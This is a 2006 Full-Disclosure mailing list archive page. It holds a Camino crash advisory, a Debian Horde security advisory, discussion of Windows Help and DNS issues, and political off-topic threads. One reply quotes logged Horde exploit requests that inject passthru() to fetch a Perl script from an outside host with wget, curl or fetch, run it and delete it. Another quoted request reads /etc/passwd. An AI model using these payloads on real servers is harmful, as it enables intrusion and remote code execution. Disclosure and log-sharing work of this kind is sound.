[Full-disclosure] Camino Browser HTML Parsing Null Pointer Dereference Denial of Service Vulnerability
//- Advisory Program : Camino Browser Homepage : http://www.caminobrowser.org Tested version : = 1.0 Found by : Simon MOREL philemon at thehackademy dot net This advisory: Simon MOREL philemon at thehackademy dot net Discovery date : 2006/04/13 //- Application description The Camino Project has worked to create a browser that is as functional and elegant as the computers it runs on. The Camino web browser is powerful and ready to meet the needs of all users while remaining simple and elegant in its design.. //- Description of vulnerability Camino Browser is prone to a denial-of-service condition when parsing certain malformed HTML content. //- Proof Of Concept legend kbd object h4 /object /kbd //- Solution Not Yet. //- Impact Successful exploitation will cause the browser to crash. //- Credits Simon MOREL philemon at thehackademy dot net http://www.sysdream.com //- Greetings Thomas Waldegger bugtraq at morph3us dot org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1034-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 14th, 2006http://www.debian.org/security/faq - -- Package: horde2 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-1260 CVE-2006-1491 Several remote vulnerabilities have been discovered in the Horde web application framework, which may lead to the execution of arbitrary web script code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-1260 Null characters in the URL parameter bypass a sanity check, which allowed remote attackers to read arbitrary files, which allowed information disclosure. CVE-2006-1491 User input in the help viewer was passed unsanitised to the eval() function, which allowed injection of arbitrary web code. The old stable distribution (woody) doesn't contain horde2 packages. For the stable distribution (sarge) these problems have been fixed in version 2.2.8-1sarge2. The unstable distribution (sid) does no longer contain horde2 packages. We recommend that you upgrade your horde2 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn nrfwvObZjSThW+pXcD8NI38= =BIdm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities
Guten Tag ! Leider kann ich Ihre e-mail nicht sofort beantworten, da ich mich bis einschl. 21.04.2006 nicht im Hause befinde. In dringenden Fällen wenden Sie sich bitte an meinen Kollegen Timo Dahlhoff Tel. : 02506 / 922 - 5266 e-mail : [EMAIL PROTECTED] Rocco Maiullari Webmaster The Phone House Telecom GmbH Münsterstr. 109 48155 Münster Fon: +49 (0) 2506 - 922 5256 Fax: +49 (0) 2506 - 922 1292 E-Mail: [EMAIL PROTECTED] http://www.phonehouse.de Senken Sie Ihre Telefonrechnung - mit TalkTalk, unserem neuen Festnetzangebot! Mehr Infos unter: www.talktalk.de full-disclosure 04/14/06 16:42 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1034-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 14th, 2006http://www.debian.org/security/faq - -- Package: horde2 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-1260 CVE-2006-1491 Several remote vulnerabilities have been discovered in the Horde web application framework, which may lead to the execution of arbitrary web script code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-1260 Null characters in the URL parameter bypass a sanity check, which allowed remote attackers to read arbitrary files, which allowed information disclosure. CVE-2006-1491 User input in the help viewer was passed unsanitised to the eval() function, which allowed injection of arbitrary web code. The old stable distribution (woody) doesn't contain horde2 packages. For the stable distribution (sarge) these problems have been fixed in version 2.2.8-1sarge2. The unstable distribution (sid) does no longer contain horde2 packages. We recommend that you upgrade your horde2 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn nrfwvObZjSThW+pXcD8NI38= =BIdm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities
Here's another attempt: GET /horde//services/help/?show=aboutmodule=;%22 .passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47). %22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net% 22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h ;rm%20-rf%20h*%22);'. HTTP/1.1 404 77 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) :) On Fri, 2006-04-14 at 10:49, ... wrote: from [funsec] (thx Henderson, Dennis K.) Which web server would be a target for this GET? Not sure what group to post this to but I'm sure having fun watching the attempts.. :) GET /horde2/services/help/?show=aboutmodule=;%22.passthru(%22cat%20%22.chr( 47).%22etc%22.chr(47)[EMAIL PROTECTED] com%22);'. HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Host: x.x.x.x Connection: Close /from [funsec] - Original Message - From: Moritz Muehlenhoff [EMAIL PROTECTED] To: debian-security-announce@lists.debian.org Sent: Friday, April 14, 2006 4:42 PM Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1034-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 14th, 2006http://www.debian.org/security/faq - -- Package: horde2 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-1260 CVE-2006-1491 Several remote vulnerabilities have been discovered in the Horde web application framework, which may lead to the execution of arbitrary web script code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-1260 Null characters in the URL parameter bypass a sanity check, which allowed remote attackers to read arbitrary files, which allowed information disclosure. CVE-2006-1491 User input in the help viewer was passed unsanitised to the eval() function, which allowed injection of arbitrary web code. The old stable distribution (woody) doesn't contain horde2 packages. For the stable distribution (sarge) these problems have been fixed in version 2.2.8-1sarge2. The unstable distribution (sid) does no longer contain horde2 packages. We recommend that you upgrade your horde2 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn nrfwvObZjSThW+pXcD8NI38= =BIdm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it.
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
Nick FitzGerald wrote: So, the exception is not that the IP is hard-coded, but that the DNS resolver skips looking in hosts for that _domain_ and necessarily does a network DNS lookup... Presumably, it uses whichever DNS server the local OS thinks it should use, no differently than any other application on the machine. So, the workaround for Dave who wants to block connections is simple, for a given value of simple of course -- run a local, caching only DNS resolver, which proxies everything back to the usual DNS server, *except* for which Microsoft sub-domains you'd like to overrule. I know nothing of BIND configuration (or any other DNS server) but I imagine this is at least possible. Unless the DNS server is itself hardcoded in MediaPlayer, as well? cheers /i -- And what exactly is a dream? And what exactly is a joke? - Syd Barrett ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
On Fri, 14 Apr 2006, imipak wrote: Nick FitzGerald wrote: So, the exception is not that the IP is hard-coded, but that the DNS resolver skips looking in hosts for that _domain_ and necessarily does a network DNS lookup... Unless the DNS server is itself hardcoded in MediaPlayer, as well? My guess is that it uses a default dns server from microsoft at a stable IP. -- MVH, Vidar Laetrile is the pits ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] info about recent Ms issue
Hi, I recently read an exploit for an MS issue in which the author apologised to some people he had met at a sec. conference for not disclosing the vulnerability at that time because he was holding out for the iDefense bounty. I can't find the exploit now and was wondering if anyone else had read this and can point me in the right direction. thanks. Moe. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] info about recent Ms issue
if you are looking about this http://www.securityfocus.com/archive/1/430871/30/0/threaded this is not a vulnerability for MS because the .hlp file is a script file and they believe that's not secured at all, c0ntex just posted a fresh advisory of something wich has been found years ago, disclosed hundred of times, but he looks to have time to loose. [EMAIL PROTECTED] wrote: Hi, I recently read an exploit for an MS issue in which the author apologised to some people he had met at a sec. conference for not disclosing the vulnerability at that time because he was holding out for the iDefense bounty. I can't find the exploit now and was wondering if anyone else had read this and can point me in the right direction. thanks. Moe. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] info about recent Ms issue
http://www.open-security.org/advisories/15 /* * $ An open security advisory #15 - Windows Help Heap Overflow * 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org 2: Bug Released: March 31st 2006 3: Bug Impact Rate: Undefined 4: Bug Scope Rate: Local / Remote in cases * $ This advisory and/or proof of concept code must not be used for commercial gain. * Windows Help www.microsoft.com There is a heap based buffer overflow in the rendering engine of .hlp files in winhlp32.exe which will allow some attacker the possibility of modifying the internal structure of the process with a means to execute arbitrary and malicious code. By modifying the value of an image embedded within a .hlp file, (tested with ? image and [] button images) it is possible to trigger this bug and overflow a static buffer that is defined for data sections of the .hlp file. This grants the attacker with the ability to perform an overwrite of block(n) and the following blocks control data. I thought this was an april fools but it's a day too early :) Microsoft decide to reject this issue as Windows Help is a scriptable environment and as such should not be trusted, as a malicious person could add this said script to .hlp files which would execute stuff on the users system. Therefor I release this Heap Overflow as another untrustable issue with this Microsoft product. I met some Microsoft Security Auditor guys at Blackhat, Alex and some dude called Skylined --- sorry that I didnt mention this bug or the one in hh.exe and t3h ebUl.chm, I was selling out to get IDefense bug bounty, but alas it back fired. I could have done with $1 but ho hum, you win some you loose some :-) */ -KF [EMAIL PROTECTED] wrote: Hi, I recently read an exploit for an MS issue in which the author apologised to some people he had met at a sec. conference for not disclosing the vulnerability at that time because he was holding out for the iDefense bounty. I can't find the exploit now and was wondering if anyone else had read this and can point me in the right direction. thanks. Moe. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. pgpQmknhz3tI2.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
That's twisted logic Valdis. If some of the 'non-voters' who didn't like Kerry *had* voted, Kerry would have lost even more badly than he had. Why are people bringing politics into the mailing lists? And why should people demonize a person or party just because they don't agree? On 4/14/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him.And close to half of the people who *did* vote didn't vote for him.If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office.___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
joe haldon wrote: That's twisted logic Valdis. If some of the 'non-voters' who didn't like Kerry *had* voted, Kerry would have lost even more badly than he had. And what about the lines of people waiting to vote in predominantly democratic districts of red states whose ability to vote was negated by what can only be called electoral sabotage? Didn't happen, right? Right... There were so many voting irregularities in the last election that if we were a third-world country being monitored, the election would have been heavily contested and labeled as fraudulant by all Western Nations... but since we're the last world superpower, our leaders get away with what other countries get lambasted for. Truth be told, more people hate the current republican party than like it. If everyone who could have voted would have voted, it would be a landslide victory for the left. This is especially true if people were to vote along ideological lines rather than party lines. Many people (stupidly) voted for Bush because they thought he'd better represent the interests of the common man... in other words, they voted red when they should have been voting blue. And why should people demonize a person or party just because they don't agree? Because in this case you have a party that is wilfully and intentfully trying to destroy democracy in this country. If it were just that we didn't agree, well then we could talk. But through the neo-conservative movement you have an attempt at a corporate neo-fascist takeover of the country. Why should we demonize these people? We didn't -- they're just about as close to demons as you can get in reality. Their own actions have demonized them. -bkfsec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
On Friday, April 14, 2006 12:17 PM, joe haldon wrote: Date: Fri, 14 Apr 2006 13:17:53 -0400 From: joe haldon To: [EMAIL PROTECTED] [EMAIL PROTECTED] Subject: Re: [Full-disclosure] Gary McKinnon That's twisted logic Valdis. If some of the 'non-voters' who didn't like Kerry *had* voted, Kerry would have lost even more badly than he had. Why are people bringing politics into the mailing lists? And why should people demonize a person or party just because they don't agree? Joe, I am not really up to date regarding voter fraud this past election. However, politics has alot to do with this mailing list such as laws and regulations (Patriot Act) affecting the IT security sector. I feel alot of people who voted republican are the majority who want GWB out of office. And yes, this mailing list is solely to share information concerning security, only to say demonizing one person (GWB) accountable for killing thousands of innocent people should not be a shock to this list! Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds - Einstein Cuanta estupidez en tan poco cerebro! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
[EMAIL PROTECTED] wrote: On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. And if pigs had wings they could fly. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Gary McKinnon
If Pigs have wings, there's a long list of things that I'd need to do. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, April 14, 2006 12:59 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon [EMAIL PROTECTED] wrote: On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. And if pigs had wings they could fly. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
agreed, if Pigs had wings, I'd be in lots and lots of trouble. for that matter if a monkey all of a sudden shoots out my butt, I'd be in bigger trouble than the obvious ok, lets take this a bit further, and go under the assumption that hell exists according to the myth of heaven and hell... and hell were to freeze over, there's be lots of stuff that I'd have to do that isn't appealing. Exibar - Original Message - From: Dixon, Wayne [EMAIL PROTECTED] To: Paul Schmehl [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 2:05 PM Subject: RE: [Full-disclosure] Gary McKinnon If Pigs have wings, there's a long list of things that I'd need to do. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, April 14, 2006 12:59 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon [EMAIL PROTECTED] wrote: On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. And if pigs had wings they could fly. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Gary McKinnon
Oh how right you are. I think all of the people on this list would be in a lot of trouble. All of this reminds me of the Hell Freezing over anecdote I read a while back. Wayne -Original Message- From: Exibar [mailto:[EMAIL PROTECTED] Sent: Friday, April 14, 2006 1:54 PM To: Dixon, Wayne; Paul Schmehl; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon agreed, if Pigs had wings, I'd be in lots and lots of trouble. for that matter if a monkey all of a sudden shoots out my butt, I'd be in bigger trouble than the obvious ok, lets take this a bit further, and go under the assumption that hell exists according to the myth of heaven and hell... and hell were to freeze over, there's be lots of stuff that I'd have to do that isn't appealing. Exibar - Original Message - From: Dixon, Wayne [EMAIL PROTECTED] To: Paul Schmehl [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 2:05 PM Subject: RE: [Full-disclosure] Gary McKinnon If Pigs have wings, there's a long list of things that I'd need to do. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, April 14, 2006 12:59 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon [EMAIL PROTECTED] wrote: On Thu, 13 Apr 2006 14:52:54 CDT, you said: I don't understand they very same people who voted for that pig (GWB) Keep in mind that less than half the registered voters voted for him. And close to half of the people who *did* vote didn't vote for him. If some of the non-voters who didn't like him *had* voted, he'd likely not gotten back in office. And if pigs had wings they could fly. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. That settles it. May as well disconnect right now. -- Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
sure sounds like he has prior knowledge of a terrorist cyber-attack to me. - Original Message - From: Nobody Particular [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 3:31 PM Subject: Re: [Full-disclosure] Gary McKinnon Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
I'm expressing an opinion. You know, the reason you guys are bombing the hell out of innocent civils for, to make it possible for folks to express an opinion. If this was China, I wouldn't be allowed to express an opinion, i'd be locked up or have my house knocked down, to make room for sky scrapers to develop upon. This is a UK maling list, and while you Ameircans don't believe in freedom, we in UK do, so go ahead, arrest me, make me a cyber celebrity and throw away the key. Thats what the super power of freedom does, locks people up and throw away the key, without a trial. On 4/14/06, Nobody Particular [EMAIL PROTECTED] wrote: Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Gary McKinnon
Remember, not everybody in America shares the same opinion as those who are in charge. Bush's approval rating is 35%, the lowest of his presidency, and I expect that it will only get lower. Nobody says anybody approves of the bombing of civilians. Webguy -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Friday, April 14, 2006 2:48 PM To: Nobody Particular; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Gary McKinnon I'm expressing an opinion. You know, the reason you guys are bombing the hell out of innocent civils for, to make it possible for folks to express an opinion. If this was China, I wouldn't be allowed to express an opinion, i'd be locked up or have my house knocked down, to make room for sky scrapers to develop upon. This is a UK maling list, and while you Ameircans don't believe in freedom, we in UK do, so go ahead, arrest me, make me a cyber celebrity and throw away the key. Thats what the super power of freedom does, locks people up and throw away the key, without a trial. On 4/14/06, Nobody Particular [EMAIL PROTECTED] wrote: Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gary McKinnon
Lock me up, throw away the key... go on. Send me to Gbay and torture and rape me, like whats already happening. United States of Human Rights On 4/14/06, Exibar [EMAIL PROTECTED] wrote: sure sounds like he has prior knowledge of a terrorist cyber-attack to me. - Original Message - From: Nobody Particular [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, April 14, 2006 3:31 PM Subject: Re: [Full-disclosure] Gary McKinnon Ah, so you're stating you have prior knowledge of and involvement in a Felony conspiracy? n3td3v wrote: Because theres going to be major cyber attacks next month if this guy is sent to the United States. On 4/14/06, joe haldon [EMAIL PROTECTED] wrote: Why are people bringing politics into the mailing lists? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: 